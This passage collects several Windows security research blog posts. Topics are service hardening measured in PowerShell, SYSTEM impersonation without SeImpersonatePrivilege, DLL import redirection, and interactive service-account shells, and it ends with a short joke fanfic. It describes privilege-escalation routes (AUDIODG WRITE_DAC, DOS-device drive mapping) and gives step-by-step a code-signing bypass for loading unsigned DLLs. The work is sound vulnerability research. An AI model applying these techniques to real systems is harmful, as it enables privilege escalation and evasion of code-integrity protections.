The two privileges I've highlighted, SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege give these accounts effectively full system access when combined with a suitable privileged token. Part of WSH is also giving control over what privileges the service account actually requires. The default is to allow all privileges, however when configuring a service you can specify a list of privileges to restrict the service to. For example the CDPSvc service is configured to only require SeImpersonatePrivilege. Quite why they bother to put this restriction on the service I don't know ¯\_(ツ)_/¯.

What's the difference between LS and NS? The primary difference is LS has no network credentials, so accessing network resources as that user would only succeed as an anonymous login. NS on the other hand is created with the credentials of the computer account and so can interact with the network for resources allowed by that authentication. This only really matters to domain joined machines, standalone machines would not share the computer account with anyone else.

Per-Service SID

The first big addition in WSH was the Per-Service SID. This SID is automatically added to the group list of default groups shown previously by the SCM when creating the service's primary token. The service SID is also added with the SE_GROUP_OWNER flag set and is not mandatory, which means it can be set as the token's default owner when creating new resources and it can disabled. The basic idea is a service can ACL its resources to this SID to prevent other services from accessing them. The use of a service SID is optional, but the majority of default services are configured to use it. An example SID for CDPSvc is as follows:

S-1-5-80-3433512109-503559027-1389316256-1766580070-2256751264

The SID is derived by generating a SHA1 hash of the service name and adding that as the SID's RIDs (with an extra 80 at the start to signify it's a service SID). The use of a hash should make it extremely unlikely two services would generate the same SID.

Of course it's up to the service to actually ACL their resources appropriately. To aid in that the token's default DACL is also configured to the following (for CDPSvc):

- Type  : Allowed
- Name  : NT AUTHORITY\SYSTEM
- Access: Full Access

- Type  : Allowed
- Name  : OWNER RIGHTS
- Access: ReadControl

- Type  : Allowed
- Name  : NT SERVICE\CDPSvc
- Access: Full Access

The three entries grant SYSTEM and the service SID full access to any resources with this DACL. It then limits the owner of the resource through OWNER RIGHTS to only READ_CONTROL access. This directly prevents one service account accessing the resources of another for write access. Unfortunately the default DACL is only applied when there's no other access control specified, either explicitly at creation time or due to inheritance. 

One other thing to point out is that Windows still has shared services through the use of SVCHOST. If multiple services are registered in a specific SVCHOST instance then the SCM will create the token with all service SIDs in the group list and default DACL even if a service isn't currently loaded in the host. That has become less of an issue since Windows 1703, as long as you have greater that 3.5GB of RAM services will run in separate SVCHOST instances and all services will be totally separate.

Write-Restricted Token

The second big addition to WSH was the concept of Write-Restricted (WR) tokens. Restricted token's have existed since Windows 2000 and are created using the NtFilterToken system call. The basic concept is the token can have a list of additional groups which are consulted when ever an access check is performed. First the access check is run on the default group list, if access would be granted the access check is run again on the restricted SIDs. If the second check is successful then the access check passes, if not access is denied. 

Restricted tokens are used for sandboxing (such as in Chrome) but are difficult to setup correctly as it blocks all access equally including reading critical files on disk. WR tokens solve the access problem by only blocking write access but leaving read and execute access alone. 

In order for a service configured as WR to write to a resource the associated security descriptor must contain the required access for one of the following restricted SIDs.

Everyone
NT AUTHORITY\LogonSessionId_X_Y
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\SERVICE_NAME

The WRITE RESTRICTED SID is a special group SID which resources can apply if they expect a service to write to the resource. This SID is also added to the token's groups by the SCM so that it can be used to pass both checks. By combining service SIDs and WR the amount of resources a service can modify should be significantly reduced.

And the Rest

There's a few things which are technically part of service hardening which won't really consider for the experiment:

The main one is additional rules in the firewall to block network services or requests being made from a service. This is arguably more to prevent remote compromise than it is to prevent cross-service attacks. 

Another is Session 0 Isolation and System Integrity Level. Session 0 Isolation was introduced to prevent Shatter Attacks, by preventing any windows being created by a service on the same desktop as a normal user. System Integrity Level through UIPI then prevents attacks even if the service did create a window on a normal user desktop as it'd be at a much higher IL (even than Administrators). The System IL does admittedly also have a security access check function but it's not that important for cross-service attacks.

Experiment Procedure

On to the experiment itself. Based on the hypothesis I presented earlier the goal is to determine if you can write to resources of one service from another service even though they're the same user. To make this testable I decided on the following procedure:

Step 1: Build an access token for a service which doesn't exist on the system.
Step 2: Enumerate all resources of a specific type which are owned by the token owner and perform an access check using the token.
Step 3: Collate the results based on the type of resource and whether write access was granted.

The reason for choosing to build a token for a non-existent service is it ensures we should only see the resources that could be shared by other services as the same user, not any resources which are actually designed to be accessible by being created by a service. These steps need to be repeated for different access tokens, we'll use the following five:
  • LOCAL SERVICE
  • LOCAL SERVICE, Write Restricted
  • NETWORK SERVICE
  • NETWORK SERVICE, Write Restricted
  • Control
We'll test both normal service SID and WR versions of the access token to see if it makes much of a difference. One thing to determine is what to use as a control. Ideally the control would be another service account with WSH disabled. However I couldn't find a way to disable WSH entirely to do this test, so instead we need some other control. If our hypothesis holds and WSH is effective we'd expect no resources to be writable, therefore we need to pick a control account where we know this is not true. The easiest is just to use the current logged on user account, it should be able to access almost all its own resources.

What resources do we want to inspect? The obvious type is Process/Thread resources. Getting write access to either of these in another service is probably a trivial to get full system compromise through impersonate. We'd want to get a bigger picture however, it'd be useful to include Files, Registry keys and Named Kernel Objects. These resources might not directly lead to compromise but it does give us a general idea of the maximum impact. 

It's worth noting that the hypothesis made a point to specify writing to the resources of a service which has impersonate privilege from one which does not. However this experimental process will only base the analysis on whether the resource is owned by the service user. This is intentional, it'd be too complex to attribute the resource to a specific service in all cases. However an assumption is made that more services running as a specific user have impersonate privilege than do not, therefore in all probability any resource you can write to is probably owned by one of them. We could verify that assumption if we liked, but I'll probably not.

Finally, a good experiment should be something which can be repeatable and verifiable. To that end I'll provide all the code necessary to perform the steps, written in PowerShell and using my NtObjectManager module. If you want to re-run the experiment you should be able to do so and produce a very similar set of results.

Experiment Procedure Detail

On to specific PowerShell steps to perform the experiment. First off you'll need my NtObjectManager module, specifically at least version 1.1.25 as I've added a few extra commands to simplify the process. You will also need to run all the commands as the SYSTEM user, some command will need it (such as getting access tokens) others benefit for the elevated privileges. From an admin command prompt you can create a SYSTEM PowerShell console using the following command:

Start-Win32ChildProcess -RequiredPrivilege SeTcbPrivilege,SeBackupPrivilege,SeRestorePrivilege,SeDebugPrivilege powershell

This command will find a SYSTEM process to create the new process from which also has, at a minimum, the specified list of privileges. Due to the way the process is created it'll also have full access to the current desktop so you can spawn GUI applications running at system if you need them.

The experiment will be run on a VM of Windows 1909 Enterprise updated to December 2019 from a split-token admin user account. This just ensures the minimum amount of configuration changes and additional software is present. Of course there's going to be variability on the number of services running at any one time, there's not a lot which can be done about that. However it's expected that the result should be same even if the individual resources available are not. If you were concerned you could rerun the experiment on multiple different installs of Windows at different times of day and aggregate the results.

Creating the Access Tokens

We need to create 5 access tokens for the test. Ideally we'd like to create the four service tokens using the exact method used by the SCM. We could register our unknown service and start the service to steal its token. There is also an undocumented RGetServiceProcessToken SCM RPC method in newer versions of Windows 10. However I think creating a service risks some resources being populated with that service's identity which might not be what we really want. Instead we can use LogonUserExExW which is what the SCM uses, with the LOGON32_LOGON_SERVICE type to create LS and NS tokens. This will work as long as we have SeTcbPrivilege. We'll then just add the appropriate groups, convert to WR,  and remove privileges as necessary. We can get to the LogonUserExExW API using Get-NtToken. I've wrapped up everything into a function Get-ServiceToken, you can see the full function in the final script. Using this function we can create all the tokens we need using the following commands:

$tokens = @()
$tokens += Get-ServiceToken LocalService FakeService
$tokens += Get-ServiceToken LocalService FakeService -WriteRestricted
$tokens += Get-ServiceToken NetworkService FakeService
$tokens += Get-ServiceToken NetworkService FakeService -WriteRestricted

For the control token we'll get the unmodified session access token for the current desktop. Even though we're running as SYSTEM as we're running on the same desktop we can just use the following command:

$tokens += Get-NtToken -Session -Duplicate

Random note. When calling LogonUserExExW and requesting a service SID as an additional group the call will fail with access denied. However this only happens if the service SID is the first NT Authority SID in the additional groups list. Putting any other NT Authority SID, including our new logon session SID before the service SID makes it work. Looking at the code in LSASRV (possibly the function LsapCheckVirtualAccountRestriction) it looks like the use of a service SID should be restricted to the first process (based on its PID) that used a service SID which would be the SCM. However if another NT Authority SID is placed first the checking loop sets a boolean flag which prevents the loop checking any more SIDs and so the service SID is ignored. I've no idea if this is a bug or not, however as you need TCB privilege to set the additional groups I don't think it's a security issue.

Resource Checking and Result Collation

With the 5 tokens in hand we can progress to assessing accessible resources. The original purpose of my Sandbox Analysis tools was finding accessible resources from a sandbox process, however the same code is capable of finding resources accessible from any access token, including service tokens.

First as way of example lets run checks for process and threads:

$ps = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ProcessOnly -AllowEmptyAccess
$ts = Get-AccessibleProcess -Tokens $tokens `
    -CheckMode ThreadOnly -AllowEmptyAccess

We can pass a list of tokens to the checking command, this improves performance as we only do the enumeration of resources for every token group then do the access check. Each generated access result has a TokenId property which indicates the unique ID of the token which was used for the check, this allows us to extract the correct results later. We also specify the AllowEmptyAccess option, which will generate a result even if the access check fails and the token has no access to the resource. This will be useful to allow us to assess what resources are owned by the token's owner SID but we were not granted access.

Let's do the rest of the resources:

$os = Get-AccessibleObject \ -Recurse `
    -Tokens $tokens -AllowEmptyAccess
$fs = Get-AccessibleFile -Win32Path "$env:SystemDrive\" `
    -FormatWin32Path -Recurse -Tokens $tokens -AllowEmptyAccess
$ks = Get-AccessibleKey \Registry -FormatWin32Path -Recurse `
    -Tokens $tokens -AllowEmptyAccess

We'll only get the accessible files on the system drive in this case as that'll be the only drive in the VM. Note that Get-AccessibleObject doesn't check ALPC ports, it's not possible to open an ALPC port by name and read its security descriptor. We'll ignore ALPC ports for this experiment, as it's probably worthy of a topic all on its own.

We now have all the results we need in five variables along with the tokens. If you want to run it yourself the final script is on Github here. It'll take a fair amount of time to run but once it's complete you'll find 5 CSV files in the current directory containing the results for each token.

Experiment Results

We now need to do our basic analysis of the results. Let's start with calculating the percentage of writable resources for each token type relative to the total number of resources. From my single experiment run I got the following table:

TokenWritableWritable (WR)Total
Control99.83%N/A13171
Network Service65.00%0.00%300
Local Service62.89%0.70%574

As we expected the control token had almost 100% of the owned resources writable by the user.  However for the two service accounts both had over 60% of their owned resources writable when using an unrestricted token. That level is almost completely eliminated when using a WR token, there were no writable resources for NS and only 4 resources writable from LS, which was less than 1%. Those 4 resources were just Events, from a service perspective not very exciting though there were ACL'ed to everyone which is unusual.

Just based on these numbers alone it would seem that WSH really is a failure when used unrestricted but is probably fine when used in WR mode. It'd be interesting to dig into what types are writable in the unrestricted mode to get a better understanding of where WSH is failing. This is what I've summarized in the following table:

TypeLS Writable%LS WritableNS Writable%NS Writable
Directory0.28%10.51%1
Event1.66%60.51%1
File74.24%26848.72%95
Key22.44%8149.23%96
Mutant0.28%10.51%1
Process0.28%10.00%0
Section0.55%20.00%0
SymbolicLink0.28%10.51%1
Thread0.00%00.00%0

The clear winners, if there is such a thing is Files and Registry Keys taking up over 95% of the resources which are writable. Based on what we know about how WSH works this is understandable. The likelihood is any keys/files are getting their security through inheritance from the parent container. This will typically result in at least the owner field being the service account granted WRITE_DAC access, or the inherited DACL will contain an OWNER CREATOR SID which results an explicit access for the service account.

What is perhaps more interesting is the results for Processes and Threads, neither NS or LS have any writable threads and only LS has a single writable process. This primary reason for the lack of writable threads and processes is due to the default DACL which is used for new processes when an explicit DACL isn't specified. The DACL has a OWNER RIGHTS SID granted only READ_CONTROL access, the result is that even if the owner of the resource is the service account it isn't possible to write to it. The only way to get full access as per the default DACL is by having the specific service SID in your group list.

Why does LS have one writable process? This I think is probably a "bug" in the Audio Service which creates the AUDIODG process. If we look at the security descriptor of the AUDIODG process we see the following:

<Owner>
 - Name  : NT AUTHORITY\LOCAL SERVICE

<DACL>
 - Type  : Allowed
 - Name  : NT SERVICE\Audiosrv
 - Access: Full Access

 - Type  : Allowed
 - Name  : NT AUTHORITY\Authenticated Users
 - Access: QueryLimitedInformation

The owner is LS which will grant WRITE_DAC access to the resource if nothing else is in the DACL to stop it. However the default DACL's OWNER RIGHTS SID is missing from the DACL, which means this was probably set explicitly by the Audio Service to grant Authenticated Users query access. This results in the access not being correctly restricted from other service accounts. Of course AUDIODG has SeImpersonatePrivilege so if you find yourself inside a LS unrestricted process with no impersonate privilege you can open AUDIODG (if running) for WRITE_DAC, change the DACL to grant full access and get back impersonate privileges.

If you look at the results one other odd thing you'll notice is that while there are readable threads there are no readable processes, what's going on? If we look at a normal LS service process' security descriptor we see the following:

<Owner>
 - Name  : NT AUTHORITY\LogonSessionId_0_202349

<DACL>
 - Type  : Allowed
 - Name  : NT AUTHORITY\LogonSessionId_0_202349
 - Access: Full Access

 - Type  : Allowed
 - Name  : BUILTIN\Administrators
 - Access: QueryInformation|QueryLimitedInformation

We should be able to see the reason, the owner is not LS, but instead the logon session SID which is unique per-service. This blocks other LS processes from having any access rights by default. Then the DACL only grants full access to the logon session SID, even administrators are apparently not the be trusted (though they can typically just bypass this using SeDebugPrivilege). This security descriptor is almost certainly set explicitly by the SCM when creating the process.

Is there anything else interesting in writable resources outside of the files and keys? The one interesting result shared between NS and LS is a single writable Object Directory. We can take a look at the results to find out what directories these are, to see if they share any common purpose. The directory paths are \Sessions\0\DosDevices\00000000-000003e4 for NS and \Sessions\0\DosDevices\00000000-000003e5 for LS. These are the service account's DOS Device directory, the default location to start looking up drive mappings. As the accounts can write to their respective directory this gives another angle of attack, you can compromise any service process running as the same used by dropping a mapping for the C: drive and waiting the process to load a DLL. Leaving that angle open seems sloppy, but it's not like there are no alternative routes to compromise another service.

I think that's the limit of my interest in analysis. I've put my results up on Google Drive here if you want to play around yourself.

Conclusions

Even though I've not run the experiment on multiple machines, at different times with different software I think I can conclude that WSH does not provide any meaningful security boundary when used in its default unrestricted mode. Based on the original hypothesis we can clearly write to resources not created by a service and therefore could likely fully compromise the system. The implementation does do a good job of securing process and thread resources which provide trivial elevation routes but that can be easily compromised if there's appropriate processes running (including some COM services). I can fully support this not being something MS would want to defend through issuing bulletins.

However when used in WR mode WSH is much more comprehensive. I'd argue that as long as a service doesn't have impersonate privilege then it's effectively sandboxed if running in with a WR token. MS already support sandbox escapes as a defended boundary so I'm not sure why WR sandboxes shouldn't also be included as part of that. For example if the trick using the Task Scheduler worked from a WR service I'd see that as circumventing a security boundary, however I don't work in MSRC so I have no influence on what is or is not fixed.

Of course in an ideal world you wouldn't use shared accounts at all. Versions of Windows since 7 have support for Virtual Service Accounts where the service user is the service SID rather than a standard service account and the SCM even limits the service's IL to High rather than System. Of course by default these accounts still have impersonate privilege, however you could also remove that.

Don't Use SYSTEM Tokens for Sandboxing (Part 1 of N)

This is just a quick follow on from my last post on Windows Service Hardening. I'm going to pick up on why you shouldn't use a SYSTEM token for a sandbox token. Specifically I'll describe an unexpected behavior when you mix the SYSTEM user and SeImpersonatePrivilege, or more specifically if you remove SeImpersonatePrivilege.

As I mentioned in the last post it's possible to configure services with a limited set of privileges. For example you can have a service where you're only granted SeTimeZonePrivilege and every other default privilege is removed. Interestingly you can do this for any service running as SYSTEM. We can check what services are configured without SeImpersonatePrivilege with the following PS.

PS> Get-RunningService -IncludeNonActive | ? { $_.UserName -eq "LocalSystem" -and $_.RequiredPrivileges.Count -gt 0 -and "SeImpersonatePrivilege" -notin $_.RequiredPrivileges } 

On my machine that lists 22 services which are super secure and don't have SeImpersonatePrivilege configured. Of course the SYSTEM user is so powerful that surely it doesn't matter whether they have SeImpersonatePrivilege or not. You'd be right but it might surprise you to learn that for the most part SYSTEM doesn't need SeImpersonatePrivilege to impersonate (almost) any user on the computer.

Let's see a diagram for the checks to determine if you're allowed to impersonate a Token. You might know it if you've seen any of my presentations, or read part 3 of Reading Your Way Around UAC.

Impersonation FlowChat. Showing that there's an Origin Session Check.

Actually this diagram isn't exactly like I've shown before I changed one of the boxes. Between the IL check and the User check I've added a box for "Origin Session Check". I've never bothered to put this in before as it didn't seem that important in the grand scheme. In the kernel call SeTokenCanImpersonate the check looks basically like:

if (proctoken->AuthenticationId == 
    imptoken->OriginatingLogonSession) {
return STATUS_SUCCESS;
}

The check is therefore, if the current Process Token's Authentication ID matches the Impersonation Token's OriginatingLogonSession ID then allow impersonation. Where is OriginatingLogonSession coming from? The value is set when an API such as LogonUser is used, and is set to the Authentication ID of the Token calling the API. This check allows a user to get back a Token and impersonate it even if it's a different user which would normally be blocked by the user check. Now what Token authenticates all new users? SYSTEM does, therefore almost every Token on the system has an OriginatingLogonSession value set to the Authentication ID of the SYSTEM user.

Not convinced? We can test it from an admin PS shell. First create a SYSTEM PS shell from an Administrator PS shell using:

PS> Start-Win32ChildProcess powershell

Now in the SYSTEM PS shell check the current Token's Authentication ID (yes I know Pseduo is a typo ;-)).

PS> $(Get-NtToken -Pseduo).AuthenticationId

LowPart HighPart
------- --------
    999        0

Next remove SeImpersonatePrivilege from the Token:

PS> Remove-NtTokenPrivilege SeImpersonatePrivilege

Now pick a normal user token, say from Explorer and dump the Origin.

PS> $p = Get-NtProcess -Name explorer.exe
PS> $t = Get-NtToken -Process $p -Duplicate
PS> $t.Origin

LowPart HighPart
------- --------
    999        0

As we can see the Origin matches the SYSTEM Authentication ID. Now try and impersonate the Token and check what the resultant impersonation level assigned was:

PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Impersonation

We can see the final line shows the impersonation level as Impersonation. If we'd been blocked impersonating the Token it'd be set to Identification level instead.

If you think I've made a mistake we can force failure by trying to impersonate a SYSTEM token but at a higher IL. Run the following to duplicate a copy of the current token, reduce IL to High then test the impersonation level.

PS> $t = Get-NtToken -Duplicate
PS> Set-NtTokenIntegrityLevel High
PS> Invoke-NtToken $t {$(Get-NtToken -Impersonation -Pseduo).ImpersonationLevel}
Identification

As we can see, the level has been set to Identification. If SeImpersonatePrivilege was being granted we'd have been able to impersonate the higher IL token as the privilege check is before the IL check.

Is this ever useful? One place it might come in handy is if someone tries to sandbox the SYSTEM user in some way. As long as you meet all the requirements up to the Origin Session Check, especially IL, then you can still impersonate other users even if that's been stripped away. This should work even in AppContainers or Restricted as the check for sandbox tokens happens after the session check.

The take away from this blog should be:

  • Removing SeImpersonatePrivilege from SYSTEM services is basically pointless.
  • Never try create a sandboxed process which uses SYSTEM as the base token as you can probably circumvent all manner of security checks including impersonation.



DLL Import Redirection in Windows 10 1909

While poking around in NTDLL the other day for some Chrome work I noticed an interesting sounding new feature, Import Redirection. As far as I can tell this was introduced in Windows 10 1809, although I'm testing this on 1909.

What piqued my interesting was during initialization I saw the following code being called:

NTSTATUS LdrpInitializeImportRedirection() {
    PUNICODE_STRING RedirectionDllName =     
          &NtCurrentPeb()->ProcessParameters->RedirectionDllName;
    if (RedirectionDllName->Length) {
        PVOID Dll;
        NTSTATUS status = LdrpLoadDll(RedirectionDllName, 0x1000001, &Dll);
        if (NT_SUCCESS(status)) {
            LdrpBuildImportRedirection(Dll);
        }
        // ...
    }

}

The code was extracting a UNICODE_STRING from the RTL_USER_PROCESS_PARAMETERS block then passing it to LdrpLoadDll to load it as a library. This looked very much like a supported mechanism to inject a DLL at startup time. Sounds like a bad idea to me. Based on the name it also sounds like it supports redirecting imports, which really sounds like a bad idea.

Of course it’s possible this feature is mediated by the kernel. Most of the time RTL_USER_PROCESS_PARAMETERS is passed verbatim during the call to NtCreateUserProcess, it’s possible that the kernel will sanitize the RedirectionDllName value and only allow its use from a privileged process. I went digging to try and find who was setting the value, the obvious candidate is CreateProcessInternal in KERNELBASE. There I found the following code:

BOOL CreateProcessInternalW(...) {
    LPWSTR RedirectionDllName = NULL;
    if (!PackageBreakaway) {
        BasepAppXExtension(PackageName, &RedirectionDllName, ...);
    }


    RTL_USER_PROCESS_PARAMETERS Params = {};
    BasepCreateProcessParameters(&Params, ...);
    if (RedirectionDllName) {
        RtlInitUnicodeString(&Params->RedirectionDllName, RedirectionDllName);
    }


    // ...

}

The value of RedirectionDllName is being retrieved from BasepAppXExtension which is used to get the configuration for packaged apps, such as those using Desktop Bridge. This made it likely it was a feature designed only for use with such applications. Every packaged application needs an XML manifest file, and the SDK comes with the full schema, therefore if it’s an exposed option it’ll be referenced in the schema.

Searching for related terms I found the following inside UapManifestSchema_v7.xsd:

<xs:element name="Properties">
  <xs:complexType>
    <xs:all>
      <xs:element name="ImportRedirectionTable" type="t:ST_DllFile" 
                  minOccurs="0"/>
    </xs:all>
  </xs:complexType>
</xs:element>

This fits exactly with what I was looking for. Specifically the Schema type is ST_DllFile which defined the allowed path component for a package relative DLL. Searching MSDN for the ImportRedirectionTable manifest value brought me to this link. Interestingly though this was the only documentation. At least on MSDN I couldn’t seem to find any further reference to it, maybe my Googlefu wasn’t working correctly. However I did find a Stack Overflow answer, from a Microsoft employee no less, documenting it *shrug*. If anyone knows where the real documentation is let me know.

With the SO answer I know how to implement it inside my own DLL. I need to define list of REDIRECTION_FUNCTION_DESCRIPTOR structures which define which function imports I want to redirect and the implementation of the forwarder function. The list is then exported from the DLL through a REDIRECTION_DESCRIPTOR structure as   __RedirectionInformation__. For example the following will redirect CreateProcessW and always return FALSE (while printing a passive aggressive statement):

BOOL WINAPI CreateProcessWForwarder(
    LPCWSTR lpApplicationName,
    LPWSTR lpCommandLine,
    LPSECURITY_ATTRIBUTES lpProcessAttributes,
    LPSECURITY_ATTRIBUTES lpThreadAttributes,
    BOOL bInheritHandles,
    DWORD dwCreationFlags,
    LPVOID lpEnvironment,
    LPCWSTR lpCurrentDirectory,
    LPSTARTUPINFOW lpStartupInfo,
    LPPROCESS_INFORMATION lpProcessInformation)
{
    printf("No, I'm not running %ls\n", lpCommandLine);
    return FALSE;
}


const REDIRECTION_FUNCTION_DESCRIPTOR RedirectedFunctions[] =
{
    { "api-ms-win-core-processthreads-l1-1-0.dll", "CreateProcessW"
                  &CreateProcessWForwarder },
};


extern "C" __declspec(dllexport) const REDIRECTION_DESCRIPTOR __RedirectionInformation__ =
{
    CURRENT_IMPORT_REDIRECTION_VERSION,
    ARRAYSIZE(RedirectedFunctions),
    RedirectedFunctions

};

I compiled the DLL, added it to a packaged application, added the ImportRedirectionTable Manifest value and tried it out. It worked! This seems a perfect feature for something like Chrome as it’s allows us to use a supported mechanism to hook imported functions without implementing hooks on NtMapViewOfSection and things like that. There are some limitations, it seems to not always redirect imports you think it should. This might be related to the mention in the SO answer that it only redirects imports directly in your applications dependency graph and doesn’t support GetProcAddress. But you could probably live with that,

However, to be useful in Chrome it obviously has to work outside of a packaged application. One obvious limitation is there doesn’t seem to be a way of specifying this redirection DLL if the application is not packaged. Microsoft could support this using a new Process Thread Attribute, however I’d expect the potential for abuse means they’d not be desperate to do so.

The initial code doesn’t seem to do any checking for the packaged application state, so at the very least we should be able to set the RedirectionDllName value and create the process manually using NtCreateUserProcess. The problem was when I did the process initialization failed with STATUS_INVALID_IMAGE_HASH. This would indicate a check was made to verify the signing level of the DLL and it failed to load.

Trying with any Microsoft signed binary instead I got STATUS_PROCEDURE_NOT_FOUND which would imply the DLL loaded but obviously the DLL I picked didn't export __RedirectionInformation__. Trying a final time with a non-Microsoft, but signed binary I got back to STATUS_INVALID_IMAGE_HASH again. It seems that outside of a packaged application we can only use Microsoft signed binaries. That’s a shame, but oh well, it was somewhat inconvenient to use anyway.

Before I go there are two further undocumented functions (AFAIK) the DLL can export.

BOOL __ShouldApplyRedirection__(LPWSTR DllName)

If this function is exported, you can disable redirection for individual DLLs based on the DllName parameter by returning FALSE.

BOOL __ShouldApplyRedirectionToFunction__(LPWSTR DllName, DWORD Index)

This function allows you to disable redirection for a specific import on a DLL. Index is the offset into the redirection table for the matched import, so you can disable redirection for certain imports for certain DLLs.

In conclusion, this is an interesting feature Microsoft added to Windows to support a niche edge case, and then seems to have not officially documented it. Nice! However, it doesn’t look like it’s useful for general purpose import redirection as normal applications require the file to be signed by Microsoft, presumably to prevent this being abused by malicious code. Also there's no trivial way to specify the option using CreateProcess and calling NtCreateUserProcess doesn't correctly initialize things like SxS and CSRSS connections.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

Now if you’ve bothered to read this far, I might as well admit you can bypass the signature check quite easily. Digging into where the DLL loading fails we find the following code inside LdrpMapDllNtFileName:

if ((LoadFlags & 0x1000000) && !NtCurrentPeb()->IsPackagedProcess)
{
  status = LdrpSetModuleSigningLevel(FileHandle, 8);
  if (!NT_SUCCESS(status))
    return status;

}

If you look back at the original call to LdrpLoadDll you'll notice that it was passing flag 0x1000000, which presumably means the DLL should be checked against a known signing level. The check is also disabled if the process is in a Packaged Process through a check on the PEB. This is why the load works in a Packaged Application, this check is just disabled. Therefore one way to get around the check would be to just use a Packaged App of some form, but that's not very convenient. You could try setting the flag manually by writing to the PEB, however that can result in the process not working too well afterwards (at least I couldn't get normal applications to run if I set the flag).

What is LdrpSetModuleSigningLevel actually doing? Perhaps we can just bypass the check?

NTSTATUS LdrpSetModuleSigningLevel(HANDLE FileHandle, BYTE SigningLevel) {
    DWORD Flags;
    BYTE CurrentLevel;
    NTSTATUS status = NtGetCachedSigningLevel(FileHandle, &Flags, &CurrentLevel);
    if (NT_SUCCESS(status))
        status = NtCompareSigningLevel(CurrentLevel, SigningLevel);
    if (!NT_SUCCESS(status))
        status = NtSetCachedSigningLevel(4, SigningLevel, &FileHandle);
    return status;

}

The code is using a the NtGetCachedSigningLevel and NtSetCachedSigningLevel system calls to use the kernel's Code Integrity module to checking the signing level. The signing level must be at least level 8, passing in from the earlier code, which corresponds to the "Microsoft" level. This ties in with everything we know, using a Microsoft signed DLL loads but a signed non-Microsoft one doesn't as it wouldn't be set to the Microsoft signing level.

The cached signature checks have had multiple flaws before now. For example watch my UMCI presentation from OffensiveCon. In theory everything has been fixed for now, but can we still bypass it?

The key to the bypass is noting that the process we want to load the DLL into isn't actually running with an elevated signing level, such as Microsoft only DLLs or Protected Process. This means the cached image section in the SECTION_OBJECT_POINTERS structure doesn't have to correspond to the file data on disk. This is effectively the same attack as the one in my blog on Virtual Box (see section "Exploiting Kernel-Mode Image Loading Behavior").

Therefore the attack we can perform is as follows:

1. Copy unsigned Import Redirection DLL to a temporary file.
2. Open the temporary file for RWX access.
3. Create an image section object for the file then map the section into memory.
4. Rewrite the file with the contents of a Microsoft signed DLL.
5. Close the file and section handles, but do not unmap the memory.
6. Start a process specifying the temporary file as the DLL to load in the RTL_USER_PROCESS_PARAMETERS structure.
7. Profit?

Copy of CMD running with the CreateProcess hook installed.

Of course if you're willing to write data to the new process you could just disable the check, but where's the fun in that :-)

Getting an Interactive Service Account Shell

Sometimes you want to manually interact with a shell running a service account. Getting a working interactive shell for SYSTEM is pretty easy. As an administrator, pick a process with an appropriate access token running as SYSTEM (say services.exe) and spawn a child process using that as the parent. As long as you specify an interactive desktop, e.g. WinSta0\Default, then the new process will be automatically assigned to the current session and you'll get a visible window.

To make this even easier, NtObjectManager implements the Start-Win32ChildProcess command, which works like the following:

PS> $p = Start-Win32ChildProcess powershell

And you'll now see a console window with a copy of PowerShell. What if you want to instead spawn Local Service or Network Service? You can try the following:

PS> $user = Get-NtSid -KnownSid LocalService
PS> $p = Start-Win32ChildProcess powershell -User $user

The process starts, however you'll find it immediately dies:

PS> $p.ExitNtStatus
STATUS_DLL_INIT_FAILED

The error code, STATUS_DLL_INIT_FAILED, basically means something during initialization failed. Tracking this down is a pain in the backside, especially as the failure happens before a debugger such as WinDBG typically gets control over the process. You can enable the Create Process event filter, but you still have to track down why it fails.

I'll save you the pain, the problem with running an interactive service process is the Local Service/Network Service token doesn't have access to the Desktop/Window Station/BaseNamedObjects etc for the session. It works for SYSTEM as that account is almost always granted full access to everything by virtue of either the SYSTEM or Administrators SID, however the low-privileged service accounts are not.

One way of getting around this would be to find every possible secured resource and add the service account. That's not really very reliable, miss one resource and it might still not work or it might fail at some indeterminate time. Instead we do what the OS does, we need to create the service token with the Logon Session SID which will grant us access to the session's resources.

First create a SYSTEM powershell command on the current desktop using the Start-Win32ChildProcess command. Next get the current session token with:

PS>  $sess = Get-NtToken -Session

We can print out the Logon Session SID now, for interest:

PS> $sess.LogonSid.Sid
Name                                     Sid
----                                     ---
NT AUTHORITY\LogonSessionId_0_41106165   S-1-5-5-0-41106165

Now create a Local Service token (or Network Service, or IUser, or any service account) using:

PS> $token = Get-NtToken -Service LocalService -AdditionalGroups $sess.LogonSid.Sid

You can now create an interactive process on the current desktop using:

PS> New-Win32Process cmd -Token $token -CreationFlags NewConsole

You should find it now works :-)

A command prompt, running whois and showing the use as Local Service.



Taking a joke a little too far.

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Sharing a Logon Session a Little Too Much

